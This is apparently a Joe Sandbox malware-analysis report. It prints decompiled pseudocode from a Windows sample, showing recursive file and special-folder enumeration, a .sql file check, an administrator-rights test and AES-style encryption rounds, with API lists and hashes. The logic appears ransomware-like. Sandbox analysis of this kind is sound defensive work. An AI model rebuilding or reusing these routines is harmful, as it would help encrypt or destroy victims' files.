                                        				WCHAR* _v20;
                                        				intOrPtr _v24;
                                        				struct _WIN32_FIND_DATAW _v616;
                                        				void* _t35;
                                        				signed int _t37;
                                        				int _t39;
                                        				signed int _t42;
                                        				void* _t46;
                                        				signed int* _t48;
                                        				WCHAR* _t53;
                                        				intOrPtr* _t54;
                                        				short _t57;
                                        				WCHAR* _t63;
                                        				void* _t67;
                                        
                                        				_v24 = __edx;
                                        				_t63 = __ecx;
                                        				"SVWj@h"();
                                        				if(__eax == 0 || E0FC66A40(__ecx) != 0) {
                                        					L17:
                                        					__eflags = 0;
                                        					return 0;
                                        				} else {
                                        					E0FC66BE0(__ecx);
                                        					_t53 =  &(_t63[lstrlenW(__ecx)]);
                                        					_v20 = _t53;
                                        					lstrcatW(_t63, "*");
                                        					_t35 = FindFirstFileW(_t63,  &_v616);
                                        					_t57 = 0;
                                        					_v12 = _t35;
                                        					 *_t53 = 0;
                                        					if(_t35 != 0xffffffff) {
                                        						_t54 = _a12;
                                        						do {
                                        							_t37 = lstrcmpW( &(_v616.cFileName), ".");
                                        							__eflags = _t37;
                                        							if(_t37 != 0) {
                                        								_t42 = lstrcmpW( &(_v616.cFileName), L"..");
                                        								__eflags = _t42;
                                        								if(_t42 != 0) {
                                        									lstrcatW(_t63,  &(_v616.cFileName));
                                        									__eflags = _v616.dwFileAttributes & 0x00000010;
                                        									if(__eflags == 0) {
                                        										_v16 =  *_t54;
                                        										_t46 = E0FC66950(_t63,  &_v616, __eflags, _t57, _a4);
                                        										_t67 = _t67 + 8;
                                        										 *_t54 =  *_t54 + _t46;
                                        										asm("adc [ebx+0x4], edx");
                                        										__eflags =  *((intOrPtr*)(_t54 + 4)) -  *((intOrPtr*)(_t54 + 4));
                                        										if(__eflags <= 0) {
                                        											if(__eflags < 0) {
                                        												L12:
                                        												_t48 = _a8;
                                        												 *_t48 =  *_t48 + 1;
                                        												__eflags =  *_t48;
                                        											} else {
                                        												__eflags = _v16 -  *_t54;
                                        												if(_v16 <  *_t54) {
                                        													goto L12;
                                        												}
                                        											}
                                        										}
                                        									} else {
                                        										E0FC66C90(lstrcatW(_t63, "\\"), _t63, _v24, _a4, _a8, _t54);
                                        										_t67 = _t67 + 0xc;
                                        									}
                                        									_t57 = 0;
                                        									__eflags = 0;
                                        									 *_v20 = 0;
                                        								}
                                        							}
                                        							_t39 = FindNextFileW(_v12,  &_v616);
                                        							__eflags = _t39;
                                        						} while (_t39 != 0);
                                        						FindClose(_v12);
                                        						goto L17;
                                        					} else {
                                        						return 0xdeadbeaf;
                                        					}
                                        				}
                                        			}

                                        APIs
                                          • Part of subcall function 0FC66640: VirtualAlloc.KERNEL32(00000000,00000201,00003000,00000040,00000000,?,?,0FC66CA6,00000000,?,?), ref: 0FC66653
                                          • Part of subcall function 0FC66640: SHGetSpecialFolderPathW.SHELL32(00000000,00000000,0000002A,00000000,?,?,0FC66CA6,00000000,?,?), ref: 0FC666F2
                                          • Part of subcall function 0FC66640: SHGetSpecialFolderPathW.SHELL32(00000000,00000000,0000002B,00000000,?,?,0FC66CA6,00000000,?,?), ref: 0FC6670C
                                          • Part of subcall function 0FC66640: SHGetSpecialFolderPathW.SHELL32(00000000,00000000,00000024,00000000,?,?,0FC66CA6,00000000,?,?), ref: 0FC66726
                                          • Part of subcall function 0FC66640: SHGetSpecialFolderPathW.SHELL32(00000000,00000000,0000001C,00000000,?,?,0FC66CA6,00000000,?,?), ref: 0FC66740
                                          • Part of subcall function 0FC66640: VirtualFree.KERNEL32(00000000,00000000,00008000,?,?,0FC66CA6,00000000,?,?), ref: 0FC66760
                                          • Part of subcall function 0FC66A40: lstrlenW.KERNEL32(00000000,00000000,?,?), ref: 0FC66A52
                                          • Part of subcall function 0FC66A40: lstrcatW.KERNEL32(00000000,0FC6FEC4), ref: 0FC66A64
                                          • Part of subcall function 0FC66A40: FindFirstFileW.KERNEL32(00000000,?,?,?), ref: 0FC66A72
                                          • Part of subcall function 0FC66A40: lstrcmpW.KERNEL32(?,0FC6FEC8,?,?), ref: 0FC66A9C
                                          • Part of subcall function 0FC66A40: lstrcmpW.KERNEL32(?,0FC6FECC,?,?), ref: 0FC66AB2
                                          • Part of subcall function 0FC66A40: lstrcatW.KERNEL32(00000000,?), ref: 0FC66AC4
                                          • Part of subcall function 0FC66A40: lstrlenW.KERNEL32(00000000,?,?), ref: 0FC66ACB
                                          • Part of subcall function 0FC66A40: lstrcmpW.KERNEL32(-00000001,.sql,?,?), ref: 0FC66AFA
                                          • Part of subcall function 0FC66A40: CreateFileW.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000,?,?), ref: 0FC66B11
                                          • Part of subcall function 0FC66A40: GetFileSize.KERNEL32(00000000,00000000,?,?), ref: 0FC66B1C
                                          • Part of subcall function 0FC66A40: VirtualAlloc.KERNEL32(00000000,00000000,00003000,00000004,?,?), ref: 0FC66B3A
                                          • Part of subcall function 0FC66A40: ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000,?,?), ref: 0FC66B4F
                                          • Part of subcall function 0FC66BE0: VirtualAlloc.KERNEL32(00000000,00000402,00003000,00000040,00000000,?,?,?,?,0FC66CC2,00000000,?,?), ref: 0FC66BF5
                                          • Part of subcall function 0FC66BE0: wsprintfW.USER32 ref: 0FC66C03
                                          • Part of subcall function 0FC66BE0: CreateFileW.KERNEL32(00000000,40000000,00000000,00000000,00000001,00000080,00000000,?,?), ref: 0FC66C1F
                                          • Part of subcall function 0FC66BE0: GetLastError.KERNEL32(?,?), ref: 0FC66C2C
                                          • Part of subcall function 0FC66BE0: VirtualFree.KERNEL32(00000000,00000000,00008000,?,?), ref: 0FC66C78
                                        • lstrlenW.KERNEL32(00000000,00000000,?,?), ref: 0FC66CC3
                                        • lstrcatW.KERNEL32(00000000,0FC6FEC4), ref: 0FC66CDB
                                        • FindFirstFileW.KERNEL32(00000000,?,?,?), ref: 0FC66CE5
                                        • lstrcmpW.KERNEL32(?,0FC6FEC8,?,?), ref: 0FC66D1C
                                        • lstrcmpW.KERNEL32(?,0FC6FECC,?,?), ref: 0FC66D36
                                        • lstrcatW.KERNEL32(00000000,?), ref: 0FC66D48
                                        • lstrcatW.KERNEL32(00000000,0FC6FEFC), ref: 0FC66D59
                                        • FindNextFileW.KERNEL32(00003000,?,?,?), ref: 0FC66DBD
                                        • FindClose.KERNEL32(00003000,?,?), ref: 0FC66DCE
                                        Memory Dump Source
                                        • Source File: 00000001.00000002.537524053.000000000FC61000.00000020.00000001.01000000.00000003.sdmp, Offset: 0FC60000, based on PE: true
                                        • Associated: 00000001.00000002.537517635.000000000FC60000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000001.00000002.537541962.000000000FC6A000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000001.00000002.537565986.000000000FC72000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000001.00000002.537573813.000000000FC74000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_1_2_fc60000_gI5xZdIxUs.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: File$Virtuallstrcatlstrcmp$FindFolderPathSpecial$Alloclstrlen$CreateFirstFree$CloseErrorLastNextReadSizewsprintf
                                        • String ID:
                                        • API String ID: 1112924665-0
                                        • Opcode ID: c9ce803a618146805e9846fd3961e570b02e52c7e37a0aa9188da984a0b31f83
                                        • Instruction ID: 2b9a5eb1a6908867084938e52c55f658516cd29b7dd24c6c808959066a2381b1
                                        • Opcode Fuzzy Hash: c9ce803a618146805e9846fd3961e570b02e52c7e37a0aa9188da984a0b31f83
                                        • Instruction Fuzzy Hash: 5731D971A0C21AEBCF14AF65DCC6AAD77B8FF44310B0041A5F905EB102EB35AA11EB60
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 63%
                                        			E0FC63AA0() {
                                        				signed int _v8;
                                        				void* _v12;
                                        				short _v16;
                                        				struct _SID_IDENTIFIER_AUTHORITY _v20;
                                        				int _t13;
                                        				_Unknown_base(*)()* _t15;
                                        				signed int _t16;
                                        
                                        				_v20.Value = 0;
                                        				_v16 = 0x500;
                                        				_t13 = AllocateAndInitializeSid( &_v20, 2, 0x20, 0x220, 0, 0, 0, 0, 0, 0,  &_v12);
                                        				if(_t13 != 0) {
                                        					_t15 = GetProcAddress(GetModuleHandleA("advapi32.dll"), "CheckTokenMembership");
                                        					_t16 =  *_t15(0, _v12,  &_v8);
                                        					asm("sbb eax, eax");
                                        					_v8 = _v8 &  ~_t16;
                                        					FreeSid(_v12);
                                        					return _v8;
                                        				} else {
                                        					return _t13;
                                        				}
                                        			}

                                        APIs
                                        • AllocateAndInitializeSid.ADVAPI32(00000000,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?), ref: 0FC63AD0
                                        • GetModuleHandleA.KERNEL32(advapi32.dll), ref: 0FC63AE3
                                        • GetProcAddress.KERNEL32(00000000,CheckTokenMembership), ref: 0FC63AEF
                                        • FreeSid.ADVAPI32(?), ref: 0FC63B0A
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000001.00000002.537524053.000000000FC61000.00000020.00000001.01000000.00000003.sdmp, Offset: 0FC60000, based on PE: true
                                        • Associated: 00000001.00000002.537517635.000000000FC60000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000001.00000002.537541962.000000000FC6A000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000001.00000002.537565986.000000000FC72000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000001.00000002.537573813.000000000FC74000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_1_2_fc60000_gI5xZdIxUs.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: AddressAllocateFreeHandleInitializeModuleProc
                                        • String ID: CheckTokenMembership$advapi32.dll
                                        • API String ID: 3309497720-1888249752
                                        • Opcode ID: 4b28e2426369e53848c6573ff566e5cd2918f72aaa619f83f04d7b2dcebc3fc2
                                        • Instruction ID: 1364ad5768d980c357961ec0a15fcb78e6798a02cfaf59951337db2bd74d3669
                                        • Opcode Fuzzy Hash: 4b28e2426369e53848c6573ff566e5cd2918f72aaa619f83f04d7b2dcebc3fc2
                                        • Instruction Fuzzy Hash: C3F03C30A4820ABBDB009BE5EC4BFADB778EB04712F000594FA05E6181E67466148B51
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 97%
                                        			E0FC633E0(int* __ecx, void* __eflags, CHAR* _a4) {
                                        				int* _v8;
                                        				void* _t8;
                                        				char _t10;
                                        				void* _t14;
                                        				void* _t15;
                                        				char _t18;
                                        				char _t19;
                                        				int _t20;
                                        				CHAR* _t23;
                                        				CHAR* _t26;
                                        				CHAR* _t35;
                                        				CHAR* _t40;
                                        
                                        				_push(__ecx);
                                        				_t26 = _a4;
                                        				_t37 = __ecx;
                                        				_v8 = __ecx;
                                        				__ecx[3] = _t26;
                                        				_t8 = E0FC632B0(__ecx);
                                        				if(_t8 == 0 || _t8 == 0xffffffff) {
                                        					ExitProcess(0);
                                        				}
                                        				if(E0FC63320(__ecx) == 0) {
                                        					 *__ecx = 0;
                                        					_t10 =  *_t26;
                                        					if(_t10 == 0) {
                                        						goto L4;
                                        					} else {
                                        						do {
                                        							if(_t10 == 0x7b) {
                                        								_t26 =  &(_t26[1]);
                                        								_t14 = E0FC63190(_t26);
                                        								if(_t14 != 0) {
                                        									_t15 = _t14 - 1;
                                        									if(_t15 == 0) {
                                        										E0FC63200(_t37, _t26, 1);
                                        									} else {
                                        										if(_t15 == 1) {
                                        											_t18 =  *_t26;
                                        											_t35 = _t26;
                                        											if(_t18 == 0) {
                                        												L15:
                                        												_t19 =  *_t35;
                                        												if(_t19 != 0x7d) {
                                        													_t40 = _t35;
                                        													if(_t19 != 0) {
                                        														while( *_t40 != 0x7d) {
                                        															_t40 =  &(_t40[1]);
                                        															if( *_t40 != 0) {
                                        																continue;
                                        															} else {
                                        															}
                                        															goto L21;
                                        														}
                                        														 *_t40 = 0;
                                        													}
                                        													L21:
                                        													_t20 = lstrlenA(_t35);
                                        													_t23 = HeapAlloc(GetProcessHeap(), 8, _t20 + 1);
                                        													 *(_v8 + 8) = _t23;
                                        													if(_t23 != 0) {
                                        														lstrcpyA(_t23, _t35);
                                        													}
                                        													 *_t40 = 0x7d;
                                        													_t37 = _v8;
                                        												}
                                        											} else {
                                        												while(_t18 != 0x7d) {
                                        													_t35 =  &(_t35[1]);
                                        													if(_t18 == 0x3d) {
                                        														goto L15;
                                        													} else {
                                        														_t18 =  *_t35;
                                        														if(_t18 != 0) {
                                        															continue;
                                        														} else {
                                        															goto L15;
                                        														}
                                        													}
                                        													goto L25;
                                        												}
                                        											}
                                        										}
                                        									}
                                        								}
                                        							}
                                        							L25:
                                        							_t7 =  &(_t26[1]); // 0x850f00e8
                                        							_t10 =  *_t7;
                                        							_t26 =  &(_t26[1]);
                                        						} while (_t10 != 0);
                                        						return 1;
                                        					}
                                        				} else {
                                        					 *__ecx = 1;
                                        					L4:
                                        					return 1;
                                        				}
                                        			}

                                        APIs
                                          • Part of subcall function 0FC632B0: lstrlenA.KERNEL32(?,00000000,?,0FC652F0,?,?,0FC633F6,00000000,74CB6980,?,?,0FC652F0,00000000), ref: 0FC632C5
                                          • Part of subcall function 0FC632B0: lstrlenA.KERNEL32(?,?,0FC633F6,00000000,74CB6980,?,?,0FC652F0,00000000), ref: 0FC632EE
                                        • lstrlenA.KERNEL32(0FC652F1,0FC652F1,00000000,00000000,74CB6980,?,?,0FC652F0,00000000), ref: 0FC63484
                                        • GetProcessHeap.KERNEL32(00000008,00000001,?,0FC652F0,00000000), ref: 0FC6348E
                                        • HeapAlloc.KERNEL32(00000000,?,0FC652F0,00000000), ref: 0FC63495
                                        • lstrcpyA.KERNEL32(00000000,0FC652F1,?,0FC652F0,00000000), ref: 0FC634A7
                                        • ExitProcess.KERNEL32 ref: 0FC634DB
                                        Memory Dump Source
                                        • Source File: 00000001.00000002.537524053.000000000FC61000.00000020.00000001.01000000.00000003.sdmp, Offset: 0FC60000, based on PE: true
                                        • Associated: 00000001.00000002.537517635.000000000FC60000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000001.00000002.537541962.000000000FC6A000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000001.00000002.537565986.000000000FC72000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000001.00000002.537573813.000000000FC74000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_1_2_fc60000_gI5xZdIxUs.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: lstrlen$HeapProcess$AllocExitlstrcpy
                                        • String ID:
                                        • API String ID: 1867342102-0
                                        • Opcode ID: 9778137cec8c5d9bfd5201728b7237cae6a286a4b4ea158bfce6906012af50c0
                                        • Instruction ID: ae4d8efa34f97b78144cfe8454ffcfcab468c520f1e53d33de4e11f97692067a
                                        • Opcode Fuzzy Hash: 9778137cec8c5d9bfd5201728b7237cae6a286a4b4ea158bfce6906012af50c0
                                        • Instruction Fuzzy Hash: 5531397450C2C55ADB230F2988C67F5FF949B02310F984189E9C6DB383D63DAA47C7A0
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 90%
                                        			E0FC61C20(signed int* __ebx, signed int* __edi, signed int* __esi) {
                                        				signed int _t514;
                                        				signed char _t522;
                                        				signed char _t530;
                                        				signed char _t538;
                                        				signed char _t546;
                                        				signed char _t554;
                                        				signed char _t562;
                                        				signed char _t570;
                                        				signed char _t578;
                                        				signed char _t586;
                                        				void* _t595;
                                        				signed char _t603;
                                        				signed char _t618;
                                        				signed int _t628;
                                        				signed char _t630;
                                        				signed char _t631;
                                        				signed char _t633;
                                        				signed char _t635;
                                        				signed char _t636;
                                        				signed char _t638;
                                        				signed char _t640;
                                        				signed char _t641;
                                        				signed char _t643;
                                        				signed char _t645;
                                        				signed char _t646;
                                        				signed char _t648;
                                        				signed char _t650;
                                        				signed char _t651;
                                        				signed char _t653;
                                        				signed char _t655;
                                        				signed char _t656;
                                        				signed char _t658;
                                        				signed char _t660;
                                        				signed char _t661;
                                        				signed char _t663;
                                        				signed char _t665;
                                        				signed char _t666;
                                        				signed char _t668;
                                        				signed char _t670;
                                        				signed char _t671;
                                        				signed char _t673;
                                        				signed char _t675;
                                        				signed char _t676;
                                        				signed char _t681;
                                        				signed char _t682;
                                        				signed char _t684;
                                        				signed char _t686;
                                        				signed char _t687;
                                        				signed char _t690;
                                        				signed char _t691;
                                        				signed char _t693;
                                        				signed char _t695;
                                        				signed char _t696;
                                        				signed int _t699;
                                        				signed char _t700;
                                        				signed char _t708;
                                        				signed char _t709;
                                        				signed char _t717;
                                        				signed char _t718;
                                        				signed char _t726;
                                        				signed char _t727;
                                        				signed char _t735;
                                        				signed char _t736;
                                        				signed char _t744;
                                        				signed char _t745;
                                        				signed char _t753;
                                        				signed char _t754;
                                        				signed char _t762;
                                        				signed char _t763;
                                        				signed char _t771;
                                        				signed char _t772;
                                        				signed char _t780;
                                        				signed char _t781;
                                        				signed char _t789;
                                        				signed char _t797;
                                        				signed char _t798;
                                        				signed char _t806;
                                        				signed char _t814;
                                        				signed char _t815;
                                        				signed int _t824;
                                        				signed char _t825;
                                        				signed char _t826;
                                        				signed char _t827;
                                        				signed char _t828;
                                        				signed char _t829;
                                        				signed char _t830;
                                        				signed char _t831;
                                        				signed char _t832;
                                        				signed char _t833;
                                        				signed char _t834;
                                        				signed char _t835;
                                        				signed char _t836;
                                        				signed char _t837;
                                        				signed char _t838;
                                        				signed char _t839;
                                        				signed char _t840;
                                        				signed char _t841;
                                        				signed char _t842;
                                        				signed char _t843;
                                        				signed char _t844;
                                        				signed char _t845;
                                        				signed char _t846;
                                        				signed char _t847;
                                        				signed char _t848;
                                        				signed char _t849;
                                        				signed int _t851;
                                        				signed int* _t924;
                                        				signed int* _t997;
                                        				signed int* _t998;
                                        				signed int* _t999;
                                        				signed int* _t1011;
                                        				signed int* _t1012;
                                        				signed int* _t1024;
                                        				signed int* _t1025;
                                        				signed int* _t1037;
                                        				signed int* _t1038;
                                        				signed int* _t1050;
                                        				signed int* _t1051;
                                        				signed int* _t1063;
                                        				signed int* _t1064;
                                        				signed int* _t1076;
                                        				signed int* _t1077;
                                        				signed int* _t1089;
                                        				signed int* _t1090;
                                        				signed int* _t1102;
                                        				signed int* _t1103;
                                        				signed int* _t1115;
                                        				signed int* _t1116;
                                        				signed int* _t1128;
                                        				signed int* _t1129;
                                        				signed int* _t1131;
                                        				signed int* _t1143;
                                        				signed int* _t1144;
                                        				signed int* _t1156;
                                        				signed int* _t1168;
                                        				signed int* _t1169;
                                        				signed int** _t1181;
                                        
                                        				_t1181[4] = _t997;
                                        				_t1181[3] = __ebx;
                                        				_t1181[2] = __esi;
                                        				_t1181[1] = __edi;
                                        				_t924 = _t1181[6];
                                        				_t998 = _t1181[8];
                                        				_t851 = _t998[0x3c] & 0x000000ff;
                                        				_t514 =  *_t924 ^  *_t998;
                                        				_t628 = _t924[1] ^ _t998[1];
                                        				_t699 = _t924[2] ^ _t998[2];
                                        				_t824 = _t924[3] ^ _t998[3];
                                        				if(_t851 == 0xa0) {
                                        					L6:
                                        					_t999 =  &(_t998[4]);
                                        					 *_t1181 = _t999;
                                        					asm("rol eax, 0x10");
                                        					_t630 = _t628 & 0xffff0000 | _t514 >> 0x00000010;
                                        					_t700 = _t699 >> 0x10;
                                        					_t631 = _t630 >> 0x10;
                                        					_t825 = _t824 >> 0x10;
                                        					_t708 = _t999[2] ^  *(0xfc6c240 + (_t699 & 0x000000ff) * 4) ^  *(0xfc6c640 + (_t628 & 0x000000ff) * 4) ^  *(0xfc6ca40 + (_t514 & 0x000000ff) * 4) ^  *(0xfc6ce40 + (_t825 & 0x000000ff) * 4);
                                        					_t826 = _t999[3] ^  *(0xfc6c240 + (_t824 & 0x000000ff) * 4) ^  *(0xfc6c640 + (_t699 & 0x000000ff) * 4) ^  *(0xfc6ce40 + (_t514 & 0x000000ff) * 4) ^  *(0xfc6ca40 + (_t631 & 0x000000ff) * 4);
                                        					_t1011 =  *_t1181;
                                        					_t522 =  *(0xfc6ca40 + (_t700 & 0x000000ff) * 4) ^  *(0xfc6c240 + (_t630 & 0x000000ff) * 4) ^  *(0xfc6c640 + (_t824 & 0x000000ff) * 4) ^  *(0xfc6ce40 + (_t631 & 0x000000ff) * 4) ^  *_t1011;
                                        					_t633 =  *(0xfc6c240 + (_t628 & 0x000000ff) * 4) ^  *(0xfc6c640 + (_t630 & 0x000000ff) * 4) ^  *(0xfc6ce40 + (_t700 & 0x000000ff) * 4) ^  *(0xfc6ca40 + (_t825 & 0x000000ff) * 4) ^ _t1011[1];
                                        					_t1012 =  &(_t1011[4]);
                                        					 *_t1181 = _t1012;
                                        					asm("rol eax, 0x10");
                                        					_t635 = _t633 & 0xffff0000 | _t522 >> 0x00000010;
                                        					_t709 = _t708 >> 0x10;
                                        					_t636 = _t635 >> 0x10;
                                        					_t827 = _t826 >> 0x10;
                                        					_t717 = _t1012[2] ^  *(0xfc6c240 + (_t708 & 0x000000ff) * 4) ^  *(0xfc6c640 + (_t633 & 0x000000ff) * 4) ^  *(0xfc6ca40 + (_t522 & 0x000000ff) * 4) ^  *(0xfc6ce40 + (_t827 & 0x000000ff) * 4);
                                        					_t828 = _t1012[3] ^  *(0xfc6c240 + (_t826 & 0x000000ff) * 4) ^  *(0xfc6c640 + (_t708 & 0x000000ff) * 4) ^  *(0xfc6ce40 + (_t522 & 0x000000ff) * 4) ^  *(0xfc6ca40 + (_t636 & 0x000000ff) * 4);
                                        					_t1024 =  *_t1181;
                                        					_t530 =  *(0xfc6ca40 + (_t709 & 0x000000ff) * 4) ^  *(0xfc6c240 + (_t635 & 0x000000ff) * 4) ^  *(0xfc6c640 + (_t826 & 0x000000ff) * 4) ^  *(0xfc6ce40 + (_t636 & 0x000000ff) * 4) ^  *_t1024;
                                        					_t638 =  *(0xfc6c240 + (_t633 & 0x000000ff) * 4) ^  *(0xfc6c640 + (_t635 & 0x000000ff) * 4) ^  *(0xfc6ce40 + (_t709 & 0x000000ff) * 4) ^  *(0xfc6ca40 + (_t827 & 0x000000ff) * 4) ^ _t1024[1];
                                        					_t1025 =  &(_t1024[4]);
                                        					 *_t1181 = _t1025;
                                        					asm("rol eax, 0x10");
                                        					_t640 = _t638 & 0xffff0000 | _t530 >> 0x00000010;
                                        					_t718 = _t717 >> 0x10;
                                        					_t641 = _t640 >> 0x10;
                                        					_t829 = _t828 >> 0x10;
                                        					_t726 = _t1025[2] ^  *(0xfc6c240 + (_t717 & 0x000000ff) * 4) ^  *(0xfc6c640 + (_t638 & 0x000000ff) * 4) ^  *(0xfc6ca40 + (_t530 & 0x000000ff) * 4) ^  *(0xfc6ce40 + (_t829 & 0x000000ff) * 4);
                                        					_t830 = _t1025[3] ^  *(0xfc6c240 + (_t828 & 0x000000ff) * 4) ^  *(0xfc6c640 + (_t717 & 0x000000ff) * 4) ^  *(0xfc6ce40 + (_t530 & 0x000000ff) * 4) ^  *(0xfc6ca40 + (_t641 & 0x000000ff) * 4);
                                        					_t1037 =  *_t1181;
                                        					_t538 =  *(0xfc6ca40 + (_t718 & 0x000000ff) * 4) ^  *(0xfc6c240 + (_t640 & 0x000000ff) * 4) ^  *(0xfc6c640 + (_t828 & 0x000000ff) * 4) ^  *(0xfc6ce40 + (_t641 & 0x000000ff) * 4) ^  *_t1037;
                                        					_t643 =  *(0xfc6c240 + (_t638 & 0x000000ff) * 4) ^  *(0xfc6c640 + (_t640 & 0x000000ff) * 4) ^  *(0xfc6ce40 + (_t718 & 0x000000ff) * 4) ^  *(0xfc6ca40 + (_t829 & 0x000000ff) * 4) ^ _t1037[1];
                                        					_t1038 =  &(_t1037[4]);
                                        					 *_t1181 = _t1038;
                                        					asm("rol eax, 0x10");
                                        					_t645 = _t643 & 0xffff0000 | _t538 >> 0x00000010;
                                        					_t727 = _t726 >> 0x10;
                                        					_t646 = _t645 >> 0x10;
                                        					_t831 = _t830 >> 0x10;
                                        					_t735 = _t1038[2] ^  *(0xfc6c240 + (_t726 & 0x000000ff) * 4) ^  *(0xfc6c640 + (_t643 & 0x000000ff) * 4) ^  *(0xfc6ca40 + (_t538 & 0x000000ff) * 4) ^  *(0xfc6ce40 + (_t831 & 0x000000ff) * 4);
                                        					_t832 = _t1038[3] ^  *(0xfc6c240 + (_t830 & 0x000000ff) * 4) ^  *(0xfc6c640 + (_t726 & 0x000000ff) * 4) ^  *(0xfc6ce40 + (_t538 & 0x000000ff) * 4) ^  *(0xfc6ca40 + (_t646 & 0x000000ff) * 4);
                                        					_t1050 =  *_t1181;
                                        					_t546 =  *(0xfc6ca40 + (_t727 & 0x000000ff) * 4) ^  *(0xfc6c240 + (_t645 & 0x000000ff) * 4) ^  *(0xfc6c640 + (_t830 & 0x000000ff) * 4) ^  *(0xfc6ce40 + (_t646 & 0x000000ff) * 4) ^  *_t1050;
                                        					_t648 =  *(0xfc6c240 + (_t643 & 0x000000ff) * 4) ^  *(0xfc6c640 + (_t645 & 0x000000ff) * 4) ^  *(0xfc6ce40 + (_t727 & 0x000000ff) * 4) ^  *(0xfc6ca40 + (_t831 & 0x000000ff) * 4) ^ _t1050[1];
                                        					_t1051 =  &(_t1050[4]);
                                        					 *_t1181 = _t1051;
                                        					asm("rol eax, 0x10");
                                        					_t650 = _t648 & 0xffff0000 | _t546 >> 0x00000010;
                                        					_t736 = _t735 >> 0x10;
                                        					_t651 = _t650 >> 0x10;
                                        					_t833 = _t832 >> 0x10;
                                        					_t744 = _t1051[2] ^  *(0xfc6c240 + (_t735 & 0x000000ff) * 4) ^  *(0xfc6c640 + (_t648 & 0x000000ff) * 4) ^  *(0xfc6ca40 + (_t546 & 0x000000ff) * 4) ^  *(0xfc6ce40 + (_t833 & 0x000000ff) * 4);
                                        					_t834 = _t1051[3] ^  *(0xfc6c240 + (_t832 & 0x000000ff) * 4) ^  *(0xfc6c640 + (_t735 & 0x000000ff) * 4) ^  *(0xfc6ce40 + (_t546 & 0x000000ff) * 4) ^  *(0xfc6ca40 + (_t651 & 0x000000ff) * 4);
                                        					_t1063 =  *_t1181;
                                        					_t554 =  *(0xfc6ca40 + (_t736 & 0x000000ff) * 4) ^  *(0xfc6c240 + (_t650 & 0x000000ff) * 4) ^  *(0xfc6c640 + (_t832 & 0x000000ff) * 4) ^  *(0xfc6ce40 + (_t651 & 0x000000ff) * 4) ^  *_t1063;
                                        					_t653 =  *(0xfc6c240 + (_t648 & 0x000000ff) * 4) ^  *(0xfc6c640 + (_t650 & 0x000000ff) * 4) ^  *(0xfc6ce40 + (_t736 & 0x000000ff) * 4) ^  *(0xfc6ca40 + (_t833 & 0x000000ff) * 4) ^ _t1063[1];
                                        					_t1064 =  &(_t1063[4]);
                                        					 *_t1181 = _t1064;
                                        					asm("rol eax, 0x10");
                                        					_t655 = _t653 & 0xffff0000 | _t554 >> 0x00000010;
                                        					_t745 = _t744 >> 0x10;
                                        					_t656 = _t655 >> 0x10;
                                        					_t835 = _t834 >> 0x10;
                                        					_t753 = _t1064[2] ^  *(0xfc6c240 + (_t744 & 0x000000ff) * 4) ^  *(0xfc6c640 + (_t653 & 0x000000ff) * 4) ^  *(0xfc6ca40 + (_t554 & 0x000000ff) * 4) ^  *(0xfc6ce40 + (_t835 & 0x000000ff) * 4);
                                        					_t836 = _t1064[3] ^  *(0xfc6c240 + (_t834 & 0x000000ff) * 4) ^  *(0xfc6c640 + (_t744 & 0x000000ff) * 4) ^  *(0xfc6ce40 + (_t554 & 0x000000ff) * 4) ^  *(0xfc6ca40 + (_t656 & 0x000000ff) * 4);
                                        					_t1076 =  *_t1181;
                                        					_t562 =  *(0xfc6ca40 + (_t745 & 0x000000ff) * 4) ^  *(0xfc6c240 + (_t655 & 0x000000ff) * 4) ^  *(0xfc6c640 + (_t834 & 0x000000ff) * 4) ^  *(0xfc6ce40 + (_t656 & 0x000000ff) * 4) ^  *_t1076;
                                        					_t658 =  *(0xfc6c240 + (_t653 & 0x000000ff) * 4) ^  *(0xfc6c640 + (_t655 & 0x000000ff) * 4) ^  *(0xfc6ce40 + (_t745 & 0x000000ff) * 4) ^  *(0xfc6ca40 + (_t835 & 0x000000ff) * 4) ^ _t1076[1];
                                        					_t1077 =  &(_t1076[4]);
                                        					 *_t1181 = _t1077;
                                        					asm("rol eax, 0x10");
                                        					_t660 = _t658 & 0xffff0000 | _t562 >> 0x00000010;
                                        					_t754 = _t753 >> 0x10;
                                        					_t661 = _t660 >> 0x10;
                                        					_t837 = _t836 >> 0x10;
                                        					_t762 = _t1077[2] ^  *(0xfc6c240 + (_t753 & 0x000000ff) * 4) ^  *(0xfc6c640 + (_t658 & 0x000000ff) * 4) ^  *(0xfc6ca40 + (_t562 & 0x000000ff) * 4) ^  *(0xfc6ce40 + (_t837 & 0x000000ff) * 4);
                                        					_t838 = _t1077[3] ^  *(0xfc6c240 + (_t836 & 0x000000ff) * 4) ^  *(0xfc6c640 + (_t753 & 0x000000ff) * 4) ^  *(0xfc6ce40 + (_t562 & 0x000000ff) * 4) ^  *(0xfc6ca40 + (_t661 & 0x000000ff) * 4);
                                        					_t1089 =  *_t1181;
                                        					_t570 =  *(0xfc6ca40 + (_t754 & 0x000000ff) * 4) ^  *(0xfc6c240 + (_t660 & 0x000000ff) * 4) ^  *(0xfc6c640 + (_t836 & 0x000000ff) * 4) ^  *(0xfc6ce40 + (_t661 & 0x000000ff) * 4) ^  *_t1089;
